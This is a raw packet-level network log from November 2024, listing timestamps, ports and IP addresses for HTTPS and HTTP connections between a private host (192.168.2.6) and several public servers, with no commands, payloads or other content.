Nov 26, 2024 00:25:40.006607056 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:40.006660938 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:40.006860971 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:40.006874084 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:40.075126886 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.092303038 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.092320919 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.092906952 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.092911005 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.101061106 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101078987 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.101126909 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101310968 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101345062 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.101388931 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101583004 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101589918 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.101705074 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.101716042 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.124677896 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.142211914 CET	443	49829	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.142302990 CET	49829	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.365417957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.610342026 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.610375881 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.610407114 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.610579967 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.610914946 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.610975981 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.610994101 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.611005068 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.611011028 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.611043930 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.611478090 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.611550093 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.611598015 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.611821890 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611843109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611855984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611865997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611879110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611900091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611912012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611923933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611918926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.611918926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.611936092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611958981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611968994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.611983061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.612000942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.612000942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.612000942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.612026930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.612453938 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.612453938 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.612467051 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.612469912 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.612656116 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.612669945 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.612692118 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.612698078 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.613578081 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.613975048 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.614339113 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.614348888 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.614548922 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.614551067 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.614603996 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.615667105 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.615736961 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.615736961 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.615811110 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.616996050 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.617012978 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.618207932 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.618275881 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.618542910 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.618808031 CET	443	49827	18.165.220.110	192.168.2.6
Nov 26, 2024 00:25:40.618855953 CET	49827	443	192.168.2.6	18.165.220.110
Nov 26, 2024 00:25:40.619091034 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.619188070 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.619839907 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.619946957 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.620507956 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.620666027 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.620811939 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.620820045 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.621331930 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.623985052 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624003887 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.624094963 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624232054 CET	49845	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624269009 CET	443	49845	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.624269962 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624277115 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.624377012 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624377966 CET	49845	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.624912024 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.624985933 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.625447035 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.625458956 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.625576973 CET	49845	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.625588894 CET	443	49845	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.625657082 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:40.625672102 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.680074930 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.680589914 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.680613995 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.681679010 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.681749105 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.682455063 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.682533979 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.683353901 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.683830976 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.683841944 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.684895992 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.685008049 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.685551882 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.685621977 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.686321974 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.686321974 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.686342955 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.686363935 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.686381102 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.735120058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.735332966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.742841959 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.742841959 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.742850065 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.742866039 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.742867947 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.742897987 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:40.773768902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.773788929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.773837090 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.773866892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.777837038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.777909994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.777966022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.778012037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.786320925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.786386013 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.789274931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.789339066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.789372921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.789433002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.797763109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.797785997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.797848940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.797848940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.806065083 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.806070089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.806102991 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.806129932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.806168079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.806233883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.814534903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.814608097 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.814691067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.814737082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.822947979 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.823055029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.823148012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.823246002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.831293106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.831357002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.831547976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.831823111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.839780092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.839880943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.839921951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.839973927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.849067926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.849081993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.849174023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.856641054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.856659889 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.856766939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.856766939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.864923000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.865036011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.945251942 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.945277929 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.945277929 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:40.974802971 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.974888086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.974894047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.974961996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.978976011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.979058981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.979119062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.987215996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.987298012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.987373114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.987413883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:40.995157957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.995176077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:40.995244026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.003427982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.003509045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.003575087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.003654957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.011372089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.011444092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.011554003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.011770010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.015163898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.015221119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.015235901 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.015264034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.018955946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.018985033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.019023895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.019061089 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.022773981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.022839069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.022888899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.023071051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.026457071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.026541948 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.027825117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.027909040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.030297041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.030366898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.030417919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.030467987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.034055948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.034132004 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.034164906 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.034239054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.037846088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.037949085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.038017035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.041630030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.041698933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.041709900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.041928053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.045373917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.045429945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.045519114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.045583963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.049355984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.049417019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.049491882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.049635887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.053009987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.053097010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.053147078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.053287029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.056726933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.056855917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.056890011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.056926966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.060674906 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.060755968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.060801029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.060854912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.096374989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.096437931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.096440077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.096537113 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.098275900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.098330021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.098372936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.098418951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.102076054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.102212906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.102288961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.102346897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.139117956 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.163665056 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.163691998 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.164509058 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.164515018 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.175877094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.175949097 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.176079988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.176326990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.177026987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.177051067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.177124977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.177253962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.180834055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.180907011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.180989027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.181106091 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.184562922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.184681892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.184720039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.184720039 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.188393116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.188575983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.188637018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.192220926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.192234993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.192298889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.195729017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.195842028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.195909977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.199397087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.199467897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.199511051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.200215101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.202980042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.203036070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.203093052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.203135967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.206702948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.206844091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.206907988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.210298061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.210350037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.210417032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.213826895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.213932037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.214015007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.217433929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.217539072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.217576027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.221071005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.221137047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.221178055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.221524000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.224663973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.224792957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.224849939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.228342056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.228414059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.228441954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.228890896 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.230458021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.230520010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.230523109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.230561972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.232677937 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.232737064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.232877970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.232924938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.234911919 CET	80	49795	185.215.113.206	192.168.2.6
